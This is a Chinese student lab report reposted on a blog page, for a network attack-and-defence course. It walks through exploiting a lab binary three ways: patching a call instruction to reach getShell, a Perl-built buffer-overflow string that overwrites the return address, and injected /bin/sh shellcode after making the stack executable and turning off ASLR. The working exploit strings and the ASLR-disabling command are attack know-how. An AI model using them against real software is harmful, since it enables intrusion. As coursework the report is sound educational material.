# 2018-2019-2 20165210《网络攻防技术》Exp1 PC平台逆向破解(BOF实验)

最新推荐文章于 2020-07-28 20:43:12 发布
最新推荐文章于 2020-07-28 20:43:12 发布
阅读量247 收藏
点赞数
原文链接:http://www.cnblogs.com/lyklyk/p/10547323.html
版权

2018-2019-2 20165210《网络攻防技术》Exp1 PC平台逆向破解(BOF实验)

实验分为三个部分:

  1. 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
  2. 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数
  3. 注入一个自己制作的shellcode并运行这段shellcode。

这几种思路,基本代表现实情况中的攻击目标:

  1. 运行原本不可访问的代码片段
  2. 强行修改程序执行流

  3. 以及注入运行任意代码。

    一、直接修改程序机器指令,改变程序执行流程

  • 知识要求:Call指令,EIP寄存器,指令跳转的偏移计算,补码,反汇编指令objdump,十六进制编辑工具
  • 学习目标:理解可执行文件与机器指令
  • 进阶:掌握ELF文件格式,掌握动态技术
    首先:反汇编20165210_1文件
objdump -d pwn1

1296638-20190317155219117-1162129411.png
1296638-20190317155240293-2037755138.png
1296638-20190317155256352-2127700201.png

反汇编结束后你发现:main函数里面有一步call 804891,机器码指令为e8 d7 ff ff ff。进一步分析:08048491是,0804847d是我们的跳转目标。

0x08048491 - 0x0804847d = 0x00000014  //计算地址差
0xffffffd7 - 0x00000014 = 0xffffffc3  //计算要篡改的目标地址

然后进入编辑文件,然后发现全是乱码,使用

:%!xxd

转换为16进制,用

/e8d7

来寻找e8d7ffffff机器指令
1296638-20190317155315175-537611238.png

找到以后按i进入插入模式,修改d7为c3,用

:%!xxd -r

换回乱码的状态,然后保存,再次

objdump -d 20165210_1

就发现改回来了
1296638-20190317155343167-1825151578.png

然后运行一下
1296638-20190317155400620-210131855.png

就成功了

二、通过构造输入参数,造成BOF攻击,改变程序执行流

缓冲区溢出攻击,即BOF攻击。简单的说就是不合法的输入把子函数的返回地址覆盖掉了,通过这种方式修改函数的返回地址,使程序代码执行“意外”的流程。
1296638-20190317155417842-1022882562.jpg

使用gdb命令,file 20165210_2载入20165210_2文件,r运行
1296638-20190317155439707-1586109265.png

1296638-20190317155455116-1873767698.png

可以看到图中

0x6c6c6b6b in ?? ()

6c是l的ASCII码值6b是k的ASCII码值
所以根据内容1中的getshell内存地址,修改输入字符串(注意要将实际地址反序录入),然后利用prel构建输入文件。

perl -e 'print "aaaaaaaassssssssddddddffffgghhjj\x7d\x84\x04\x08\x0a"' > input

Perl -e:用于在命令行而不是在脚本中执行 Perl 命令;“|”管道:将第一条命令的结果作为第二条命令的参数来使用;
然后用cat命令:

(cat input; cat ) | ./20165210_2

1296638-20190317155651980-1029074435.png

然后就成功了

三、注入Shellcode并执行

首先;下载execstack并安装

apt-get install execstack

设置堆栈可执行:

execstack -s 20165210_3   //设置堆栈可执行
execstack -q 20165210_3    //查询文件的堆栈是否可执行

关闭地址随机化

echo "0" > /proc/sys/kernel/randomize_va_space

查询地址随机化是否关闭(0代表关闭,2代表开启)

more /proc/sys/kernel/randomize_va_space

整个过程中我们需要注入一段代码,和实验二里面使用的perl类似,我们首先构造一个input_shellcode:

perl -e 'print "A" x 32;print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode

首先在一个窗口运行

(cat input_shellcode;cat) | .20165210_3;

1296638-20190317155714745-1916457947.png

在另外一个窗口

ps -ef | grep 20165210_3

能看见当前运行20165210_3的进程号;
在gdb里面attach 进程号进行调试,(gdb) disassemble foo反编译,设置断点,然后into r esp。
1296638-20190317155732177-920039744.png

0xffffd2fc+0x000004=0xffffd300

然后修:改shellcode中的内容:

perl -e 'print "A" x 32;print "\x00\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00"' > input-shellcode

运行:

(cat input-shellcode;cat) | ./20165210_3

1296638-20190317155754938-1284572463.png

四、过程中遇到的困难:

  1. 首先就是内容一中的将乱码转换为16进制,然后我改完没有再转回乱码,直接保存了,发现就不能反汇编了。
  2. 也是内容一就是找e8d7怎么找都找不到,/d7不行/e8不行/e8d7不行,最后打了/e8 d7才成功
  3. 最后还有就是内容三的设置断点阶段,我输入了continue发现在continuing就不动了,然后发现另一个终端还要回车一下(我也不是很懂为什么要回车),然后就可以继续进行了。

转载于:https://www.cnblogs.com/lyklyk/p/10547323.html

aomangsheng3817
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
0x03-逆向-BoF基础的基础
0pr
06-04 1049
目录 今日目标 深入 BoF BoF 的前世今生 BoF 的种类 BoF 的应对策略 物理寻址的应用 找到 Boot Sector 在内存中的前两个字节的位置 寄存器 寄存器的种类 通用寄存器 段寄存器 指针寄存器 索引寄存器 控制寄存器 段和段寄存器小结 完成任务 程序拆解及必要汇编指令 org 指令 jmp 指令 times 指令 pusha popa 指令 条件控制指令 其他必要的汇编指令 总结 参考链接 今日目标 今天细看了一下 narnia2(不知道这是什
Exp1逆向Bof基础实践
最新发布
04-18
网络对抗实验
20155235 《网络攻防实验逆向Bof基础实践说明
weixin_30444105的博客
03-18 311
20155235 《网络攻防实验逆向Bof基础实践说明 实验目的 本次实践的对象是一个名为pwn1的linux可执行文件。 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方...
20155321 《网络攻防Exp1 PC平台逆向破解(5)M
weixin_30367169的博客
03-08 83
20155321 《网络攻防Exp1 PC平台逆向破解(5)M 实践目标 本次实践的对象是linux的可执行文件 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学...
2018-2019-2 20165237《网络攻防技术Exp1 PC平台逆向破解
weixin_30883311的博客
03-16 81
2018-2019-2 20165237《网络攻防技术Exp1 PC平台逆向破解 一、实践目标 本次实践的对象是一个名为pwn1的linux可执行文件。 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我...
20145332 《网络攻防逆向Bof实验
weixin_30810583的博客
02-28 106
20145332 《网络攻防逆向Bof实验 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件。 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。这次实验的目标就是想办法运行这个代码片段。 我们将学习两种方法: ①...
OSCP-BoF:这是有关了解#OSCP考试中存在的#BoF机器的演练
05-04
触发BoF(这对OSCP有利,因为它们为您提供了代码段) 查找EIP偏移 确认偏移 找到坏蛋 确认错误字符+查找JMP ESP指令 确认代码执行(pop calc) 利用主机 它基于“”项目(顺便说一句,对此进行了令人敬畏的解释)...
BOF-DLL-Inject:使用Cobalt Strike的信标目标文件实现手动Map DLL注入
04-14
BOF-DLL-注入BOF DLL注入是一个自定义的,该使用手动映射DLL注入以便将dll全部从内存迁移到进程中。好处不太可能被签名DLL有效负载保留在内存中,永不接触磁盘附加功能易于实现DLL未在内核领域注册为包括EPROCESS...
BOF&麦肯锡-2020全球时尚业态报告(英文)-2019.12-108页.pdf
04-08
这份标题为《BOF&麦肯锡-2020全球时尚业态报告(英文)-2019.12-108页.pdf》的文件是一份详细探讨全球时尚行业的报告。由于文档仅提供部分摘录和部分扫描错误,我们将基于现有的信息,尽可能详细地解析报告中出现的...
k-means+BOF_k-meansBOF_DEMO_图像采集_图像检索_
09-29
文件夹sourcePictures是采集的图片库,里面有五类图像:飞机,铁塔,游轮,摩天轮,桥。 文件夹testPictures中是用来检索的图片;需要大家做的就是将sourcePictures文件夹中所有图片的路径都读到img_paths.txt文件中...
2018护网杯逆向题目
10-16
2018护网杯的3道逆向题目.
2018-2019-2 20165312《网络攻防技术Exp1 PC平台逆向破解
weixin_30478923的博客
03-15 140
2018-2019-2 20165312《网络攻防技术Exp1 PC平台逆向破解 一、Exp1.1 直接修改程序机器指令,改变程序执行流程 知识要求:Call指令,EIP寄存器,指令跳转的偏移计算,补码,反汇编指令objdump,十六进制编辑工具 实验思路:pwn1_1中main()调用foo(),此实验旨在修改程序机器指令,使得main()调用getshell()。 实验步骤: 反汇编:查看...
南京邮电大学网络攻防训练平台逆向第二题ReadAsm2
u014738665的博客
11-27 398
1、题目需求 读汇编是逆向基本功。 给出的文件是func函数的汇编 main函数如下 输出的结果即为flag,格式为flag{**********},请连flag{}一起提交 编译环境为linux gcc x86-64 调用约定为System V AMD64 ABI请不要利用汇编器,IDA等工具。。这里考的就是读汇编与推算汇编结果的能力 int main(int argc, char c...
南京邮电大学网络攻防训练平台逆向第一题Hello,RE!
u014738665的博客
11-27 585
1、打开OD或则IDA直接看,送分题 2、结果是:flag{Welcome_To_RE_World!}
20155213 《网络攻防Exp1 PC平台逆向破解
weixin_30867015的博客
03-11 75
20155213 《网络攻防Exp1 PC平台逆向破解(5)M 实践内容 通过对实践对象——pwn20155213的linux可执行文件的修改或输入,完成以下三块: 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。 注入一个自己制作的shellcode并运行这段shellco...
南京邮电大学网络攻防训练平台-逆向-Py交易
a3uRa的一个窝
10-20 413
import base64 def decode(message): message=base64.b64decode(message) b='' for i in message: i=ord(i)-16 b+=chr(i^32) print b correct = 'XlNkVmtUI1MgXWBZXCFeKY+AaXNt' decode(correct)
[安全攻防进阶篇] 一.什么是逆向分析、逆向分析应用及经典扫雷游戏逆向
热门推荐
杨秀璋的专栏
07-28 3万+
安全攻防进阶篇将更加深入的去研究恶意样本分析、逆向分析、内网渗透、网络攻防实战等。第一篇文章先带领大家学习什么是逆向分析,然后详细讲解逆向分析的典型应用,接着通过OllyDbg工具逆向分析经典的游戏扫雷,再通过Cheat Engine工具复制内存地址获取,实现一个自动扫雷程序。基础性文章,西电UI您有所帮助~
2018-2019-2 网络对抗技术 20165303 Exp1 PC平台逆向破解BOF实验
weixin_34206899的博客
03-13 197
1.实践目的 本次实践的对象是一个名为pwn1的linux可执行文件。 三个实践内容如下: 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。 注入一个自己制作的shellcode并运行这段shellcode。 目的如下 运行原本不可访问的代码片段 强行修改程序执行流 以及注入运行任...
逆向BOF基础——注入shellcode并执行&Return-to-libc
weixin_30856965的博客
03-10 407
逆向BOF基础——注入shellcode并执行 准备阶段 下载安装execstack. 本次实验实验的shellcode是心远的文章中生成的代码,即\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\ 为减少实验难度,设置堆栈可执行,并关闭地址...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值